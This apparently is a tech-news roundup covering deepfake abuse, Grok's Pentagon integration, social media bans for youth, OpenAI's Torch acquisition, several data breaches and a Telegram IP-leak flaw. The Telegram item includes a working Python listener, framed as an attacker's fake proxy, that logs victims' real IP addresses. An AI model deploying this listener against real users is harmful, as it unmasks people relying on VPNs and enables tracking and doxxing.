UK lawmaker Jess Asato said an AI-altered image depicting her in a bikini circulated online. The incident follows wider reports of sexualised deepfake abuse targeting women on social media.
Platforms hosted thousands of comments, including further manipulated images, heightening the distress. Victims describe the content as realistic, dehumanising and a violation of personal consent.
UK government ministers have pledged to ban nudification tools and criminalise the creation of non-consensual intimate images. Technology firms face pressure to remove such content, suspend offending accounts, and follow Ofcom guidance to maintain a safe online environment.
The US Department of Defence plans to integrate Elon Musk’s AI tool Grok into Pentagon networks later in January, according to Defence Secretary Pete Hegseth.
The system is expected to operate across both classified and unclassified military environments as part of a broader push to expand AI capabilities.
Hegseth also outlined an AI acceleration strategy designed to increase experimentation, reduce administrative barriers and prioritise investment across defence technology.
The approach aims to enhance access to data across federated IT systems, reflecting the official view that military AI performance depends on data availability and interoperability.
The move follows earlier decisions by the Pentagon to adopt Google’s Gemini for an internal AI platform and to award large contracts to Anthropic, OpenAI, Google and xAI for agentic AI development.
Officials describe these efforts as part of a long-term strategy to strengthen US military competitiveness in AI.
Grok’s integration comes amid ongoing controversy, including criticism over generated imagery and previous incidents involving extremist and offensive content. Several governments and regulators have already taken action against the tool, adding scrutiny to its expanded role within defence systems.
UK Prime Minister Keir Starmer has told Labour MPs that he is open to an Australian-style ban on social media for young people, following concerns about the amount of time children spend on screens.
Starmer previously opposed such a ban, arguing that enforcement would prove difficult and might instead push teenagers towards unregulated online spaces rather than safer platforms. Growing political momentum across Westminster, combined with Australia’s decision to act, has led to a reassessment of that position.
Speaking to MPs, Starmer said different enforcement approaches were being examined and added that phone use during school hours should be restricted.
UK ministers have also revisited earlier proposals aimed at reducing the addictive design of social media and strengthening safeguards on devices sold to teenagers.
Support for stricter measures has emerged across party lines, with senior figures from Labour, the Conservatives, the Liberal Democrats and Reform UK signalling openness to a ban.
A final decision is expected within months as ministers weigh child safety, regulation and practical implementation.
US AI company OpenAI has acquired healthcare technology startup Torch just days after unveiling ChatGPT Health, signalling an accelerated push into medical and clinical applications.
Financial terms were not officially disclosed, although media reports estimate the transaction at between $60 million and $100 million.
Torch was developed as a unified medical memory platform, designed to consolidate patient data from hospitals, laboratories, wearable devices and consumer testing services.
The company positioned its technology as a means to support AI systems in navigating fragmented healthcare information, rather than relying on isolated data sources.
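As a hedged illustration of what a ‘unified medical memory’ layer might look like in code, the sketch below normalises records from different sources into a single per-patient timeline; every name in it is hypothetical and it does not describe Torch’s actual design:

```python
# Hypothetical sketch: merging fragmented health records into one queryable
# per-patient timeline, so an AI system reads a single consolidated source
# instead of isolated silos. Not Torch's actual design.
from dataclasses import dataclass, field
from datetime import datetime

@dataclass
class HealthEvent:
    timestamp: datetime
    source: str   # e.g. "hospital", "lab", "wearable", "consumer_test"
    kind: str     # e.g. "diagnosis", "lab_result", "heart_rate"
    payload: dict

@dataclass
class PatientMemory:
    patient_id: str
    events: list[HealthEvent] = field(default_factory=list)

    def ingest(self, event: HealthEvent) -> None:
        """Merge an event from any source, keeping the timeline ordered."""
        self.events.append(event)
        self.events.sort(key=lambda e: e.timestamp)

    def history(self, kind: str | None = None) -> list[HealthEvent]:
        """Query the consolidated timeline, optionally filtered by kind."""
        return [e for e in self.events if kind is None or e.kind == kind]

# Records from a lab and a wearable end up in one timeline per patient.
memory = PatientMemory("patient-123")
memory.ingest(HealthEvent(datetime(2025, 11, 3), "lab", "lab_result", {"hba1c": 5.4}))
memory.ingest(HealthEvent(datetime(2025, 11, 4), "wearable", "heart_rate", {"bpm": 62}))
print([e.source for e in memory.history()])  # ['lab', 'wearable']
```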
Torch’s four-person team will join OpenAI following the acquisition, reinforcing the company’s internal healthcare expertise. OpenAI has emphasised privacy, safety and collaboration with medical professionals as core principles guiding its expansion into sensitive data environments.
The move follows a broader strategy by OpenAI to strengthen enterprise offerings, particularly for large healthcare organisations. Recent hires and partnerships suggest healthcare remains a priority area as AI adoption increases across regulated sectors.
A cyberattack on Kensington and Chelsea Council has exposed the growing vulnerability of UK public sector organisations to data breaches. The council stated that personal details linked to hundreds of thousands of residents may have been compromised after attackers targeted its shared IT infrastructure.
Security experts warn that interconnected systems, while cost-efficient, create systemic risks. Dray Agha, senior manager of security operations at Huntress, said a single breach can quickly spread across partner organisations, disrupting essential services and exposing sensitive information.
Public sector bodies remain attractive targets due to ageing infrastructure and the volume of personal data they hold. Records such as names, addresses, national ID numbers, health information, and login credentials can be exploited for fraud, identity theft, and large-scale scams.
Gregg Hardie, public sector regional vice president at SailPoint, noted that attackers often employ simple, high-volume tactics rather than sophisticated techniques. Compromised credentials allow criminals to blend into regular activity and remain undetected for long periods before launching disruptive attacks.
Hardie said stronger identity security and continuous monitoring are essential to prevent minor intrusions from escalating. Investing in resilient, segmented systems could help reduce the impact of future attacks on the UK public sector and protect critical operations.
A newly identified vulnerability in Telegram’s mobile apps allows attackers to reveal users’ real IP addresses with a single click. The flaw, known as a ‘one-click IP leak’, can expose location and network details even when VPNs or proxies are enabled.
The issue stems from Telegram’s automatic proxy-testing process. When a user clicks a disguised proxy link, the app initiates a direct connection request that bypasses any active VPN or proxy and reveals the device’s real IP address.
Cybersecurity researcher @0x6rss demonstrated an attack on X, showing that a single click is enough to log a victim’s real IP address. The request behaves similarly to known Windows NTLM leaks, where background authentication attempts expose identifying information without explicit user consent.
In a post titled ‘ONE-CLICK TELEGRAM IP ADDRESS LEAK!’, the researcher noted that the proxy’s secret key is irrelevant: much like NTLM hash leaks on Windows, Telegram automatically attempts to test the proxy, and the device’s IP address is exposed in the process.
Attackers can embed malicious proxy links in chats or channels, masking them as standard usernames. Once clicked, Telegram silently runs the proxy test, bypasses VPN or SOCKS5 protections, and sends the device’s real IP address to the attacker’s server, enabling tracking, surveillance, or doxxing.
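To illustrate the reported mechanics, here is a minimal sketch assuming nothing beyond standard sockets; the port and the proxy-link format shown in the comments are illustrative assumptions, not the researcher’s actual setup. An attacker-controlled ‘proxy’ endpoint needs only to log the source address of inbound connection attempts:

```python
# Illustrative sketch only: a bare TCP listener that records the source IP of
# every inbound connection attempt. If a client tests a disguised proxy link
# (hypothetically, something like tg://proxy?server=<host>&port=4444&secret=...)
# by connecting directly, its real address lands in this log even when the
# user's normal traffic is routed through a VPN or SOCKS5 proxy.
import socket

HOST, PORT = "0.0.0.0", 4444  # hypothetical attacker-controlled endpoint

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen()
    print(f"listening on {HOST}:{PORT}")
    while True:
        conn, (ip, src_port) = srv.accept()
        print(f"connection attempt from {ip}:{src_port}")  # the leaked real IP
        conn.close()
```

The point of the sketch is that no handshake or valid secret is required: the connection attempt itself discloses the address, which matches the researcher’s observation that the secret key is irrelevant.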
Both Android and iOS versions are affected, putting millions of privacy-focused users at risk. Researchers recommend avoiding unknown links, turning off automatic proxy detection where possible, and using firewall tools to block outbound proxy tests. Telegram has not publicly confirmed a fix.
Fintech investment platform Betterment has confirmed a data breach after hackers gained unauthorised access to parts of its internal systems and exposed personal customer information.
The incident occurred on 9 January and involved a social engineering attack connected to third-party platforms used for marketing and operational purposes.
The company said the compromised data included customer names, email and postal addresses, phone numbers and dates of birth.
No passwords or account login credentials were accessed, according to Betterment, which stressed that customer investment accounts were not breached.
Using the limited system access, attackers sent fraudulent notifications to some users promoting a crypto-related scam.
Customers were advised to ignore the messages rather than engage with them, while Betterment moved quickly to revoke the unauthorised access and open a formal investigation with external cybersecurity support.
Betterment has not disclosed how many users were affected and has yet to provide further technical details. Representatives did not respond to requests for comment at the time of publication, while the company said outreach to impacted customers remains ongoing.
The eSafety regulator in Australia has expressed concern over the misuse of the generative AI system Grok on social media platform X, following reports involving sexualised or exploitative content, particularly affecting children.
Although overall report numbers remain low, Australian authorities have observed an increase in recent weeks.
The regulator confirmed that enforcement powers under the Online Safety Act remain available where content meets defined legal thresholds.
X and other services are subject to systemic obligations requiring the detection and removal of child sexual exploitation material, alongside broader industry codes and safety standards.
eSafety has formally requested further information from X regarding safeguards designed to prevent misuse of generative AI features and to ensure compliance with existing obligations.
Previous enforcement actions taken in 2025 against similar AI services resulted in their withdrawal from the Australian market.
Additional mandatory safety codes will take effect in March 2026, introducing new obligations for AI services to limit children’s exposure to sexually explicit, violent and self-harm-related material.
Authorities emphasised the importance of Safety by Design measures and continued international cooperation among online safety regulators.
A US teenager targeted by explicit deepfake images has helped create a new training course. The programme aims to support students, parents and school staff facing online abuse.
The course explains how AI tools are used to create sexualised fake images. It also outlines legal rights, reporting steps and available victim support resources.
Research shows deepfake abuse is spreading among teenagers despite stronger laws. One in eight US teens knows someone who has been targeted by non-consensual fake images.
Developers say education remains critical as AI tools become easier to access. Schools are encouraged to adopt training to protect students and prevent harm.
Canopy Healthcare, one of New Zealand’s largest private medical oncology providers, has disclosed a data breach affecting patient and staff information, six months after the incident occurred.
The company said an unauthorised party accessed part of its administration systems on 18 July 2025, copying a ‘small’ amount of data. Affected information may include patient records, passport details, and some bank account numbers.
Canopy said it remains unclear exactly which individuals were impacted and what data was taken, adding that no evidence has emerged of the information being shared or published online.
Patients began receiving notifications in December 2025, prompting criticism over the delay. One affected patient said they were unhappy to learn about the breach months after it happened.
The New Zealand company said it notified police and the Privacy Commissioner at the time, secured a High Court injunction to prevent misuse of the data, and confirmed that its medical services continue to operate normally.